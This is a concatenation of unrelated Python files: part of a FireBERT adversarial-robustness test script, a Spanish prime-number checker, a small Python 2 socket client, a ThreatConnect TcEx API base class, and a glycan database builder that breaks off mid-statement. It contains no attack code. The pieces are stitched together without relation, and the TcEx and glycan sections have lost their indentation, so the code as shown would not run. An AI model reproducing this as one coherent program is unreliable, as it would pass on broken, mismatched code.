            points = self.region_around(v, std=std, count=count)
            # clobber the tensor for the region of perturbed vectors in there
            batch[:, token_index, :] = points
        attention_mask = attention_mask[sample_index].repeat(count, 1)
        token_type_ids = token_type_ids[sample_index].repeat(count, 1)
        return batch, attention_mask, token_type_ids, points, important_words, None

    #
    # helper methods
    #

    #
    # make a field of Gaussian-perturbed vectors around a given vector v
    #
    def region_around(self, vector, std, count, device=None):
        """Return `count` copies of `vector`, each with N(0, std) noise."""
        vectors = vector.repeat(count, 1)
        region = torch.normal(mean=vectors, std=std).cpu()
        return region

    def get_single_vector(self, word):
        #tbd
        return None

    def get_hparam(self, name):
        """Look up a single hyperparameter by name.

        Fix: self.hparams is an argparse.Namespace, which is not
        subscriptable; the original `self.hparams[name]` raised TypeError.
        """
        return getattr(self.hparams, name)
#
# Tests.
#
def test_FireBERT_FVE(task, set, reps=1, sample=1, hparams_default={}, hparams_lists=None, lightning=''):
    """Evaluate FireBERT_FVE on a clean and an adversarial ("adv_" prefixed)
    split, optionally sampling random hparams per rep, and append accuracy
    results to results/five/hparams-results.csv.

    NOTE(review): MnliProcessor/ImdbProcessor/pl/random/time are imported in
    the __main__ block below, so this function only works when the script is
    run directly. Also note the mutable default `hparams_default={}` is
    mutated via `hparams` each rep.
    """
    # prepare hyperparameters
    hparams = hparams_default
    # load the right processor class
    if task == "MNLI":
        processor = MnliProcessor({'sample_percent':sample}) # negative number means abs number of samples, not percent
    elif task == "IMDB":
        processor = ImdbProcessor({'sample_percent':sample})
    # now instantiate the models
    model = FireBERT_FVE(load_from='resources/models/'+task+lightning+'/pytorch_model.bin',
                         processor=processor,
                         hparams=hparams_default)
    processor.set_tokenizer(model.tokenizer)
    dataset, examples = processor.load_and_cache_examples("data/"+task, example_set=set)
    model.set_test_dataset(dataset, examples)
    #adv set
    # load the right processor class
    if task == "MNLI":
        adv_processor = MnliProcessor({'sample_percent':sample}) # negative number means abs number of samples, not percent
    elif task == "IMDB":
        adv_processor = ImdbProcessor({'sample_percent':sample})
    model_adv = FireBERT_FVE(load_from='resources/models/'+task+lightning+'/pytorch_model.bin',
                             processor=processor,
                             hparams=hparams_default)
    adv_processor.set_tokenizer(model.tokenizer)
    dataset_adv, examples_adv = adv_processor.load_and_cache_examples("data/"+task, example_set="adv_"+set)
    model_adv.set_test_dataset(dataset_adv, examples_adv)
    for i in range(reps):
        if hparams_lists is None:
            print("FireBERT_FVE specific test", task, set)
        else:
            print("FireBERT_FVE hparam test", task, set)
            # sample one random value per listed hparam and show the choice
            print("{")
            for item in hparams_lists.items():
                key = item[0]
                values = item[1]
                hparams[key] = random.choice(values)
                print(" '"+key+"':",str(hparams[key])+",")
            print("}")
            # set the new hparams
            model.update_hparams(hparams)
            model_adv.update_hparams(hparams)
        # evaluate clean then adversarial split
        trainer = pl.Trainer(gpus=(-1 if torch.cuda.is_available() else None))
        trainer.test(model)
        result1 = trainer.tqdm_metrics
        trainer = pl.Trainer(gpus=(-1 if torch.cuda.is_available() else None))
        trainer.test(model_adv)
        result2 = trainer.tqdm_metrics
        # append one CSV row: task, split, sample, hparams, clean acc, adv acc
        f = open("results/five/hparams-results.csv", "a+")
        print(task, ",", "adv_"+set, ",", sample, ',"',hparams,'",',result1['avg_test_acc'],",",result2['avg_test_acc'], sep="", file=f)
        f.close()
        print("iteration",i,"logged.")
        elapsed_time()
        print()
        if hparams_lists is None:
            break
def elapsed_time():
    """Print and return the seconds elapsed since the previous call
    (or since program start), updating the global t_start marker."""
    global t_start
    now = time.time()
    delta = now - t_start
    print("elapsed time: ", round(delta, 2), "s")
    t_start = now
    return delta
# Script entry point: hyperparameter search (commented out) and final test
# runs against the best hparam sets found on each dataset/model.
if __name__ == "__main__":
    import random
    import time
    import pytorch_lightning as pl
    from processors import MnliProcessor, ImdbProcessor
    t_start = time.time()
    # prepare hyperparameters
    hparams_default = {
        'batch_size':8,
        # these are for SWITCH
        'use_USE':False,
        'stop_words':True,
        'perturb_words':2,
        # this is for base
        'verbose':False,
        'vote_avg_logits':True,
        # this is for us
        'std':0.05,
        'vector_count':10
    }
    # value ranges sampled during random hparam search
    hparams_lists = {
        # these are for SWITCH
        'stop_words':[True, False],
        'perturb_words':range(1,20),
        # this is for base
        'vote_avg_logits':[True, False],
        # this is for us
        'std':np.arange(0.1,10,0.01),
        'vector_count':range(3,15)
    }
    # parameter search
    sample = 15
    #test_FireBERT_FVE("IMDB", "dev", reps=500, sample=sample, hparams_default=hparams_default, hparams_lists=hparams_lists)
    #test_FireBERT_FVE("MNLI", "dev", reps=500, sample=sample, hparams_default=hparams_default, hparams_lists=hparams_lists)
    # Monday, on lightning model
    best_IMDB_lightning = {'batch_size': 8, 'use_USE': False, 'stop_words': True, 'perturb_words': 1,
                           'verbose': False, 'vote_avg_logits': False, 'std': 8.4, 'vector_count': 11}
    best_mnli_lightning = {'batch_size': 8, 'use_USE': False, 'stop_words': False, 'perturb_words': 1,
                           'verbose': False, 'vote_avg_logits': False, 'std': 2.31, 'vector_count': 8}
    # Tuesday, on paper model
    best_mnli = {'batch_size': 8, 'use_USE': False, 'stop_words': True, 'perturb_words': 1,
                 'verbose': False, 'vote_avg_logits': True, 'std': 8.14, 'vector_count': 8}
    best_IMDB={'batch_size': 8, 'use_USE': False, 'stop_words': True, 'perturb_words': 1,
               'verbose': False, 'vote_avg_logits': True, 'std': 2.29, 'vector_count': 10}
    # actual test runs
    #test_FireBERT_FVE("IMDB", "test", reps=1, sample=100, hparams_default=best_IMDB)
    test_FireBERT_FVE("MNLI", "test", reps=1, sample=100, hparams_default=best_mnli)
|
# Ask the user for a number and report whether it is prime.
primo = int(input("Introduzca un número primo: "))
# Count divisors in [1, primo); a prime has exactly one (namely 1).
resultado = sum(1 for i in range(1, primo) if primo % i == 0)
if resultado == 1:
    print("El número %d es primo." % (primo))
else:
    print("El número %d no es primo." % (primo))
|
#!/usr/bin/env python
#client example
# Python 2 script: connect to a TCP server, send two strings, then idle
# forever (e.g. to keep a container process alive).
import socket
import time
print "Waiting for socket"
# presumably gives the 'java-server' host time to start listening — verify
time.sleep(3)
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('java-server', 10001))
client_socket.send("hello")
client_socket.send(" stackoverflow")
client_socket.close()
# busy-wait loop to keep the process running after the send completes
while 1:
    print "pending"
    time.sleep(3)
    pass # do nothing
|
"""TcEx Framework Module"""
# standard library
import logging
from abc import ABC
from collections.abc import Generator
from typing import Self
# third-party
from requests import Response, Session
from requests.exceptions import ProxyError, RetryError
# first-party
from tcex.api.tc.v3.object_collection_abc import ObjectCollectionABC
from tcex.api.tc.v3.tql.tql_operator import TqlOperator
from tcex.api.tc.v3.v3_model_abc import V3ModelABC
from tcex.exit.error_code import handle_error
from tcex.logger.trace_logger import TraceLogger
from tcex.pleb.cached_property import cached_property
from tcex.util import Util
# get tcex logger
_logger: TraceLogger = logging.getLogger(__name__.split('.', maxsplit=1)[0]) # type: ignore
class ObjectABC(ABC):
"""Object Abstract Base Class
This class is a base class for Object classes that use
multi-inheritance with a pydantic BaseModel class. To ensure
properties are not added to the model both @property and @setter
methods are used.
"""
    def __init__(self, session: Session):
        """Initialize instance properties."""
        self._session: Session = session
        # properties
        # injected by _iterate_over_sublist for nested objects
        self._parent_data = {}
        # nested items staged for removal on a subsequent update request
        self._remove_objects = {
            'associations': [],
            'attributes': [],
            'securityLabels': [],
            'tags': [],
        }
        self.util = Util()
        self.log = _logger
        # annotation only — set by _request() after the first API call
        self.request: Response
        # define/overwritten in child class
        self._model: V3ModelABC
        self._nested_field_name: str | None = None
        self._nested_filter: str | None = None
        self.type_: str
    @property
    def _api_endpoint(self) -> str:  # pragma: no cover
        """Return the type specific API endpoint."""
        raise NotImplementedError('Child class must implement this property.')
def _calculate_unique_id(self) -> dict[str, int | str]:
if self.model.id:
return {'filter': 'id', 'value': self.model.id}
if hasattr(self.model, 'xid') and self.model.xid: # type: ignore
return {'filter': 'xid', 'value': self.model.xid} # type: ignore
if self.type_.lower() in ['indicator']:
return {'filter': 'summary', 'value': self.model.summary} # type: ignore
return {}
def _iterate_over_sublist(
self, sublist_type: ObjectCollectionABC
) -> Generator[Self, None, None]:
"""Iterate over any nested collections."""
sublist = sublist_type(session=self._session) # type: ignore
# determine the filter type and value based on the available object fields.
unique_id_data = self._calculate_unique_id()
# add the filter (e.g., group.has_indicator.id(TqlOperator.EQ, 123)) for the parent object.
getattr(
getattr(sublist.filter, self._nested_filter), # type: ignore
unique_id_data.get('filter'), # type: ignore
)(TqlOperator.EQ, unique_id_data.get('value'))
# return the sub object, injecting the parent data
for obj in sublist:
obj._parent_data = {
'api_endpoint': self._api_endpoint,
'type': self.type_,
'unique_id': unique_id_data.get('value'),
}
yield obj
self.request = sublist.request
def _request(
self,
method: str,
url: str,
body: bytes | str | None = None,
params: dict | None = None,
headers: dict | None = None,
):
"""Handle standard request with error checking."""
try:
self.request = self._session.request(
method, url, data=body, headers=headers, params=params
)
if isinstance(self.request.request.body, str) and len(self.request.request.body) < 1000:
self.log.debug(f'feature=api-tc-v3, request-body={self.request.request.body}')
except (ConnectionError, ProxyError, RetryError): # pragma: no cover
handle_error(
code=951,
message_values=[
method.upper(),
None,
'{\"message\": \"Connection/Proxy Error/Retry\"}',
url,
],
)
content_type = self.request.headers.get('Content-Type')
if content_type == 'application/json' and not self.success(self.request):
err = self.request.text or self.request.reason
handle_error(
code=952,
message_values=[
(self.request.request.method or '').upper(),
self.request.status_code,
err,
self.request.url,
],
)
# log content for debugging
if content_type == 'application/json':
self.log_response_text(self.request)
@staticmethod
def _validate_id(id_: int | str | None, url: str):
"""Raise exception is id is not provided."""
if not id_: # pragma: no cover
message = '{"message": "No ID provided.", "status": "Error"}'
handle_error(code=952, message_values=['GET', '404', message, url])
@property
def as_entity(self) -> dict[str, str]: # pragma: no cover
"""Return the entity representation of the object."""
raise NotImplementedError('Child class must implement this property.')
@property
def available_fields(self) -> list[str]:
"""Return the available query param field names for this object."""
return [fd['name'] for fd in self.fields]
def create(self, params: dict | None = None) -> Response:
"""Create or Update the Case Management object.
This is determined based on if the id is already present in the object.
"""
method = 'POST'
body = self.model.gen_body_json(method=method)
params = self.gen_params(params) if params else None
self._request(
method,
self.url(method),
body,
headers={'content-type': 'application/json'},
params=params,
)
# get the response data from nested data object or full response
response_json = self.request.json()
# update the model with the response from the API
self.model = type(self.model)(**response_json.get('data'))
return self.request
def delete(self, params: dict | None = None):
"""Delete the object."""
method = 'DELETE'
body = self.model.gen_body_json(method)
# get the unique id value for id, xid, summary, etc ...
unique_id = self._calculate_unique_id().get('value')
# validate an id is available
self._validate_id(unique_id, self.url(method, unique_id))
self._request(method, self.url(method, unique_id), body, params=params)
return self.request
@cached_property
def fields(self) -> list[dict[str, str]]:
"""Return the field data for this object."""
_fields = []
r = self._session.options(f'{self._api_endpoint}/fields', params={})
if r.ok:
_fields = r.json().get('data', [])
return _fields
def gen_params(self, params: dict) -> dict:
"""Return appropriate params values."""
# convert all keys to camel case
params = {self.util.snake_to_camel(k): v for k, v in params.items()}
# special parameter for indicators to enable the return the the indicator fields
# (value1, value2, value3) on std-custom/custom-custom indicator types.
if self.type_ == 'Indicator':
params.setdefault('fields', []).append('genericCustomIndicatorValues')
# add fields parameter if provided
if '_all_' in params.get('fields', []):
params['fields'] = list(self.available_fields)
return params
def get(
self,
object_id: int | None = None,
params: dict | None = None,
) -> Response:
"""Get the Case Management Object.
.. code-block:: python
:linenos:
:lineno-start: 1
# Example of params input
{
'result_limit': 100, # How many results are retrieved.
'result_start': 10, # Starting point on retrieved results.
'fields': ['caseId', 'summary'] # Additional fields returned on the results
}
Args:
object_id: The unique id of the object to be returned.
params: Dict of the params to be sent while retrieving the Artifacts objects.
"""
method = 'GET'
object_id = object_id or self.model.id
params = self.gen_params(params) if params else None
# get the unique id value for id, xid, summary, etc ...
unique_id = self._calculate_unique_id().get('value')
# validate an id is available
self._validate_id(unique_id, self.url(method, unique_id))
body = self.model.gen_body_json(method)
self._request(method, self.url(method, unique_id), body, params)
# update model
self.model = self.request.json().get('data')
return self.request
def log_response_text(self, response: Response):
"""Log the response text."""
response_text = 'response text: (text to large to log)'
if len(response.content) < 5000: # check size of content for performance
response_text = response.text
self.log.debug(f'feature=api-tc-v3, response-body={response_text}')
@property
def model(self) -> V3ModelABC:
"""Return the model data."""
return self._model
@model.setter
def model(self, data: dict | V3ModelABC):
"""Create model using the provided data."""
if isinstance(data, type(self.model)):
# provided data is already a model, nothing required to change
self._model = data
elif isinstance(data, dict):
# provided data is raw response, load the model
self._model = type(self.model)(**data)
else:
raise RuntimeError(f'Invalid data type: {type(data)} provided.')
@cached_property
def properties(self) -> dict[str, dict | list]:
"""Return defined API properties for the current object.
This property is used in testing API consistency.
"""
_properties = {}
try:
r = self._session.options(
self._api_endpoint,
params={'show': 'readOnly'},
headers={'content-type': 'application/json'},
)
if r.ok:
_properties = r.json()
except (ConnectionError, ProxyError):
handle_error(
code=951,
message_values=[
'OPTIONS',
407,
'{\"message\": \"Connection Error\"}',
self._api_endpoint,
],
)
return _properties
@staticmethod
def success(r: Response) -> bool:
"""Validate the response is valid.
Args:
r: The response object.
Returns:
bool: True if status is "ok"
"""
status = True
if r.ok:
try:
if r.json().get('status') != 'Success': # pragma: no cover
status = False
except Exception: # pragma: no cover
status = False
else:
status = False
return status
def update(self, mode: str | None = None, params: dict | None = None) -> Response:
"""Create or Update the Case Management object.
This is determined based on if the id is already present in the object.
"""
method = 'PUT'
body = self.model.gen_body_json(method=method, mode=mode)
params = self.gen_params(params) if params else None
# get the unique id value for id, xid, summary, etc ...
unique_id = self._calculate_unique_id().get('value')
# validate an id is available
self._validate_id(unique_id, self.url(method))
self._request(
method,
self.url(method, unique_id=unique_id),
body,
headers={'content-type': 'application/json'},
params=params,
)
# get the response data from nested data object or full response
response_json = self.request.json()
self.model = type(self.model)(**response_json.get('data'))
return self.request
def url(self, method: str, unique_id: int | str | None = None) -> str:
"""Return the proper URL."""
unique_id = unique_id or self._calculate_unique_id().get('value')
if method in ['DELETE', 'GET', 'PUT']:
return f'{self._api_endpoint}/{unique_id}'
return self._api_endpoint
|
#!/usr/bin/python
import os,sys
import string
from optparse import OptionParser
import csv
import json
import glob
from collections import OrderedDict
from Bio import SeqIO
from Bio.Seq import Seq
#import commands
import subprocess
import libgly
##################
def get_sort_key_value_pub(obj):
    """Sort key for publication objects: the publication date."""
    date_value = obj["date"]
    return date_value
def get_sort_key_value_mut(obj):
    """Sort key for mutation objects: the annotation score."""
    score = obj["ann_score"]
    return score
def get_sorting_key(obj):
    """Generic sort key: the object's 'sortorder' value."""
    order = obj['sortorder']
    return order
def load_subsumption_heirarchy(in_file):
    """Build {glytoucan_ac: {related_accession: relationship}} from a subsumption sheet.

    Only rows whose relationship is "ancestor" or "descendant" (case-insensitive)
    are kept; a later row for the same (main_id, related_accession) pair
    overwrites the earlier relationship, as in the original implementation.

    Args:
        in_file: Path to the CSV sheet keyed on "glytoucan_ac".

    Returns:
        dict: Nested mapping of accession -> related accession -> relationship.
    """
    heirarchy_dict = {}
    data_frame = {}
    libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
    tmp_fl = data_frame["fields"]
    # hoist column lookups out of the row loop
    rel_acc_idx = tmp_fl.index("related_accession")
    relationship_idx = tmp_fl.index("relationship")
    rl_list = ["ancestor", "descendant"]
    for main_id in data_frame["data"]:
        for tmp_row in data_frame["data"][main_id]:
            related_accession = tmp_row[rel_acc_idx]
            relationship = tmp_row[relationship_idx].lower()
            if relationship in rl_list:
                # fix: dropped unused glytoucan_type read and gt_list constant,
                # and the redundant double-initialization of the nested dict
                heirarchy_dict.setdefault(main_id, {})[related_accession] = relationship
    return heirarchy_dict
def load_motif_glytoucan_ac_list():
    """Return the unique motif_ac_xref accessions from glycan_motif.csv."""
    in_file = path_obj["reviewed"] + "/glycan_motif.csv"
    data_frame = {}
    libgly.load_sheet(data_frame, in_file, ",")
    field_names = data_frame["fields"]
    xref_idx = field_names.index("motif_ac_xref")
    seen = {}
    for row in data_frame["data"]:
        seen[row[xref_idx]] = True
    # a dict-keys view preserves insertion order and uniqueness
    return seen.keys()
def load_species_info(species_obj, species_list):
    """Populate species_obj from species_info.csv and append the short names of
    reference species to species_list, ordered by their sort_order."""
    in_file = path_obj["misc"] + "/species_info.csv"
    libgly.load_species_info(species_obj, in_file)

    seen = {}
    candidates = []
    for key in sorted(species_obj, reverse=True):
        record = species_obj[key]
        short_name = record["short_name"]
        # keep only the first occurrence of each reference species
        if short_name in seen or record["is_reference"] != "yes":
            continue
        seen[short_name] = True
        candidates.append({"shortname": short_name, "sortorder": record["sort_order"]})

    candidates.sort(key=get_sorting_key)
    species_list.extend(entry["shortname"] for entry in candidates)
    return
def load_dictionaries(map_dict, misc_dir):
    """Fill map_dict[dict_name] = {key: [values]} according to the dictionary
    specs in conf/glycan_dictionaries.json (each spec names file globs and the
    key/value column indexes)."""
    with open("conf/glycan_dictionaries.json", "r") as handle:
        dict_list_obj = json.loads(handle.read())

    for dict_name, spec in dict_list_obj.items():
        map_dict[dict_name] = {}
        ind_list = spec["indexlist"]
        key_idx, val_idx = ind_list[0], ind_list[1]
        for pattern in spec["fileglob"]:
            for in_file in glob.glob(misc_dir + pattern):
                sheet_obj = {}
                libgly.load_sheet(sheet_obj, in_file, ",")
                for row in sheet_obj["data"]:
                    # skip empty rows and comment rows (key starting with '#')
                    if row == [] or row[key_idx][0] == "#":
                        continue
                    map_dict[dict_name].setdefault(row[key_idx], []).append(row[val_idx])
    return
def load_property_objlist(tmp_obj_dict,in_file, prop_dict,xref_info, combo_flist_one, combo_flist_two, anchor_field):
    """Load property objects keyed by a composite id into tmp_obj_dict.

    For each row in the sheet keyed on anchor_field, a combo id
    "main_id|field1|field2|..." (from combo_flist_one) identifies one object
    whose properties come from prop_dict ({output_prop: sheet_field}).  When
    combo_flist_two is non-empty, an "evidence" list of xref dicts is attached,
    deduplicated via tmp_obj_dict["seen"].

    Returns:
        int: count of distinct combo ids encountered in this call.
    """
    record_count = 0
    local_seen_dict = {}
    # shared dedup registry stored under the reserved "seen" key
    seen_dict = tmp_obj_dict["seen"]
    data_frame = {}
    libgly.load_sheet_as_dict(data_frame, in_file, ",", anchor_field)
    tmp_fl = data_frame["fields"]
    for main_id in data_frame["data"]:
        if main_id.strip() == "":
            continue
        for tmp_row in data_frame["data"][main_id]:
            combo_id = main_id
            for f in combo_flist_one:
                combo_id += "|" + tmp_row[tmp_fl.index(f)]
            combo_id = combo_id.strip()
            if combo_id not in local_seen_dict:
                record_count += 1
                local_seen_dict[combo_id] = True
            obj_one = {}
            for prop in prop_dict:
                f = prop_dict[prop]
                obj_one[prop] = tmp_row[tmp_fl.index(f)]
                # special handling for disease ontology ids (protein pipeline path)
                if prop == "do_id":
                    xref_key = tmp_row[tmp_fl.index(xref_info[0])]
                    xref_id = tmp_row[tmp_fl.index(xref_info[1])]
                    do_id = combo_id.split("|")[1]
                    obj_one[prop] = do_id
                    if do_id == "":
                        # no DO id: synthesize one from the xref key/id
                        combo_id = "%s|%s-%s" % (main_id, xref_key.split("_")[-1], xref_id)
                        obj_one[prop] = "%s-%s" % (xref_key.split("_")[-1], xref_id)
                        database_label = tmp_row[tmp_fl.index("database_label")]
                        # NOTE(review): xref_badge is referenced here but only
                        # assigned further below in the combo_flist_two branch —
                        # on the first row taking this path it would raise
                        # NameError; confirm this branch is reachable here.
                        do_name = "%s [%s disease name]" % (database_label, xref_badge)
                        obj_one["name"] = do_name
                        obj_one["url"] = map_dict["xrefkey2url"]["protein_xref_do_placeholder"][0]
                    else:
                        # NOTE(review): doid2name/doid2xrefid are module globals
                        # not defined in this file's visible scope — presumably
                        # populated elsewhere when the do_id path is used; verify.
                        do_name = doid2name[do_id][0]
                        obj_one["name"] = do_name[0].upper() + do_name[1:] + " [DO disease name]"
                        obj_one["url"] = map_dict["xrefkey2url"]["protein_xref_do"][0] % (do_id)
                        if "protein_xref_icd10cm" in doid2xrefid[do_id]:
                            obj_one["icd10"] = doid2xrefid[do_id]["protein_xref_icd10cm"][0]
            if combo_id not in seen_dict:
                seen_dict[combo_id] = True
                tmp_obj_dict[combo_id] = obj_one
                if combo_flist_two != []:
                    obj_one["evidence"] = []
            if combo_flist_two != []:
                # build one evidence (xref) entry for this row
                xref_key = tmp_row[tmp_fl.index(xref_info[0])]
                xref_id = tmp_row[tmp_fl.index(xref_info[1])]
                # fall back to the anchor id when the xref id column is blank
                xref_id = main_id if xref_id.strip() == "" else xref_id
                xref_badge = map_dict["xrefkey2badge"][xref_key][0]
                xref_url = map_dict["xrefkey2url"][xref_key][0]
                if map_dict["xrefkey2url"][xref_key][0].find("%s") != -1:
                    xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
                obj_two = {"database":xref_badge, "id":xref_id, "url":xref_url}
                combo_id_xref = combo_id
                for f in combo_flist_two:
                    combo_id_xref += "|" + tmp_row[tmp_fl.index(f)]
                combo_id_xref = combo_id_xref.strip()
                if combo_id_xref not in seen_dict:
                    seen_dict[combo_id_xref] = True
                    tmp_obj_dict[combo_id]["evidence"].append(obj_two)
    return record_count
def load_properity_list(tmp_obj_dict, in_file, field_list, sep):
    """Collect unique values of the given columns per glytoucan_ac.

    Each field value is stripped, optionally split on sep, and appended to
    tmp_obj_dict[main_id] when non-empty and not already present.
    """
    data_frame = {}
    libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
    tmp_fl = data_frame["fields"]
    for main_id, row_list in data_frame["data"].items():
        bucket = tmp_obj_dict.setdefault(main_id, [])
        for tmp_row in row_list:
            for field_name in field_list:
                raw_value = tmp_row[tmp_fl.index(field_name)].strip()
                pieces = raw_value.split(sep) if sep != "" else [raw_value]
                for value in pieces:
                    # membership is tested on the raw piece, but the stored
                    # value is stripped (matches original behavior)
                    if value != "" and value not in bucket:
                        bucket.append(value.strip())
    return
def get_protein_info(protein_obj, info_type):
    """Extract a single display field from a protein JSON object.

    Supported info_type values: gene_name, gene_url, tax_id, tax_name,
    tax_common_name, recommendedname.  Returns "" when the field is absent
    or info_type is unrecognized.
    """
    if info_type in ("gene_name", "gene_url"):
        gene_list = protein_obj["gene"]
        if gene_list == []:
            return ""
        return gene_list[0]["name"] if info_type == "gene_name" else gene_list[0]["url"]

    if info_type in ("tax_id", "tax_name", "tax_common_name"):
        species_list = protein_obj["species"]
        if species_list == []:
            return ""
        first_species = species_list[0]
        if info_type == "tax_id":
            return first_species["taxid"]
        if info_type == "tax_name":
            return first_species["name"]
        # tax_common_name: optional key
        return first_species["common_name"] if "common_name" in first_species else ""

    if info_type == "recommendedname":
        if "protein_names" not in protein_obj:
            return ""
        recommended = ""
        synonyms = []
        for name_obj in protein_obj["protein_names"]:
            if name_obj["type"] == "recommended":
                recommended = name_obj["name"]
            else:
                synonyms.append(name_obj["name"])
        # fall back to the first synonym when no recommended name exists
        if recommended == "" and synonyms != []:
            return synonyms[0]
        return recommended

    return ""
def load_protein_objects(file_name_list):
    """Load protein JSON objects for every canonical accession referenced by
    glycosylation-site, matrixdb, or enzyme sheets; accessions without a JSON
    file map to an empty dict."""
    patterns = ("proteoform_glycosylation_sites", "protein_matrixdb", "glycan_enzyme")
    seen = {}
    for file_name in file_name_list:
        if not any(file_name.find(patt) != -1 for patt in patterns):
            continue
        in_file = data_dir + "/%s.csv" % (file_name)
        data_frame = {}
        libgly.load_sheet_as_dict(data_frame, in_file, ",", "uniprotkb_canonical_ac")
        for main_id in data_frame["data"]:
            seen[main_id] = True

    protein_obj_dict = {}
    for canon in seen.keys():
        protein_jsonfile = "jsondb/proteindb/%s.json" % (canon)
        if os.path.isfile(protein_jsonfile):
            with open(protein_jsonfile, "r") as handle:
                protein_obj_dict[canon] = json.loads(handle.read())
        else:
            protein_obj_dict[canon] = {}
    return protein_obj_dict
def update_record_stat(record_stat, file_name, prop_name, n, combo_list):
    """Accumulate n into record_stat[file_name][prop_name].

    The first sighting of file_name also records combo_list under the
    'recordfields' key; later calls leave it untouched.
    """
    file_stat = record_stat.setdefault(file_name, {"recordfields": combo_list})
    file_stat[prop_name] = file_stat.get(prop_name, 0) + n
    return
#######################################
def main():
usage = "\n%prog [options]"
parser = OptionParser(usage,version="%prog version___")
parser.add_option("-s","--sec",action="store",dest="sec",help="Object section")
(options,args) = parser.parse_args()
sec_name = options.sec
global config_obj
global path_obj
global species_obj
global map_dict
global data_dir
global misc_dir
global main_dict
config_file = "../conf/config.json"
config_obj = json.loads(open(config_file, "r").read())
path_obj = config_obj[config_obj["server"]]["pathinfo"]
data_dir = "reviewed/"
misc_dir = "generated/misc/"
file_name_list = []
ds_obj_list = json.loads(open(misc_dir + "/dataset-masterlist.json", "r").read())
for obj in ds_obj_list:
ds_name = obj["name"]
ds_format = obj["format"]
mol = obj["categories"]["molecule"]
if ds_name in ["homolog_alignments", "isoform_alignments"]:
continue
if obj["categories"]["species"] == []:
if obj["integration_status"]["status"] == "integrate_all":
if "glycan" in obj["target_objects"]:
file_name_list.append("%s_%s" % (mol, ds_name))
else:
sp_list_one = sorted(obj["categories"]["species"])
for species in sp_list_one:
if species not in obj["integration_status"]["excludelist"]:
if "glycan" in obj["target_objects"]:
file_name_list.append("%s_%s_%s" % (species, mol, ds_name))
sec_info = json.loads(open("generated/misc/glycan_sectioninfo.json", "r").read())
main_dict = {}
for sec in sec_info:
main_dict[sec] = {"seen":{}}
species_obj, species_list = {}, []
load_species_info(species_obj, species_list)
map_dict = {}
load_dictionaries(map_dict, misc_dir)
pattern_list = []
if sec_name != None:
pattern_list += sec_info[sec_name]["sheetlist"]
else:
for sec in sec_info:
pattern_list += sec_info[sec]["sheetlist"]
pattern_list = list(set(pattern_list))
residue_heirarchy = json.loads(open("generated/misc/residue_heirarchy.json", "r").read())
residue2class = {}
for c in residue_heirarchy:
for m in residue_heirarchy[c]:
residue2class[m] = c
fully_determined_list = []
data_frame = {}
in_file = "reviewed/glycan_fully_determined.csv"
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
fully_determined_list.append(main_id)
selected_file_name_list = []
for file_name in file_name_list:
cond_list = []
for pat in ["_protein_masterlist"] + pattern_list:
cond_list += [file_name.find(pat) != -1]
if list(set(cond_list)) != [False]:
selected_file_name_list.append(file_name)
#Check missing files
mising_files = []
for file_name in selected_file_name_list:
file_ext = "fasta" if file_name.find("protein_allsequences") != -1 else "csv"
in_file = "%s%s.%s" % (data_dir,file_name,file_ext)
if os.path.isfile(in_file) == False:
mising_files.append(in_file)
if mising_files != []:
print ("The following files are missing:")
print (json.dumps(mising_files, indent=4))
exit()
#print (json.dumps(selected_file_name_list, indent=4))
#exit()
#in_file = "%s%s" % (data_dir,"glycan_subsumption.csv")
#heirarchy_dict = load_subsumption_heirarchy(in_file)
protein_obj_dict = load_protein_objects(selected_file_name_list)
motif_glytoucan_ac_list = load_motif_glytoucan_ac_list()
record_stat = {}
file_idx = 1
file_count = len(selected_file_name_list)
main_obj_dict = {}
for file_name in selected_file_name_list:
in_file = "%s%s.csv" % (data_dir,file_name)
if os.path.isfile(in_file) == False:
print ("make-glycandb: file %s does NOT exist!" % (in_file))
sys.exit()
print ("make-glycandb: %s [%s/%s]" % (in_file, file_idx, file_count))
file_idx += 1
#--> glytoucan_ac
sheet_name = "glycan_masterlist"
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
if main_id in main_dict["glytoucan_ac"]:
continue
main_dict["glytoucan_ac"][main_id] = main_id
tmp_row = data_frame["data"][main_id][0]
mass = tmp_row[tmp_fl.index("glycan_mass")]
mass_pme = tmp_row[tmp_fl.index("glycan_permass")]
missing_score = tmp_row[tmp_fl.index("missing_score")]
number_monosaccharides_one = tmp_row[tmp_fl.index("monosaccharides")]
glycan_type = tmp_row[tmp_fl.index("glytoucan_type")]
if mass != "":
prop_name = "mass"
mass = round(float(tmp_row[tmp_fl.index("glycan_mass")]), 2)
main_dict[prop_name][main_id] = mass
combo_list = ["glytoucan_ac", "mass"]
update_record_stat(record_stat, file_name, prop_name, 1, combo_list)
if mass_pme != "":
prop_name = "mass_pme"
mass_pme = round(float(tmp_row[tmp_fl.index("glycan_permass")]), 2)
main_dict[prop_name][main_id] = mass_pme
combo_list = ["glytoucan_ac", "mass_pme"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
number_monosaccharides_two = number_monosaccharides_one.replace("+", "")
if number_monosaccharides_two.isdigit():
prop_name = "number_monosaccharides"
main_dict[prop_name][main_id] = int(number_monosaccharides_two)
combo_list = ["glytoucan_ac", "number_monosaccharides"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
if number_monosaccharides_one.find("+") != -1:
prop_name = "number_monosaccharides_suffix"
tmp_val = number_monosaccharides_one.replace(number_monosaccharides_two,"")
main_dict[prop_name][main_id] = tmp_val
combo_list = ["glytoucan_ac", "number_monosaccharides_suffix"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
if glycan_type != "":
prop_name = "glycan_type"
main_dict[prop_name][main_id] = glycan_type
combo_list = ["glytoucan_ac", "glycan_type"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
if missing_score != "":
prop_name = "missing_score"
main_dict[prop_name][main_id] = int(missing_score)
combo_list = ["glytoucan_ac", "missing_score"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
if main_dict[prop_name][main_id] == 0:
kw = "fully_determined"
if main_id not in main_dict["keywords"]:
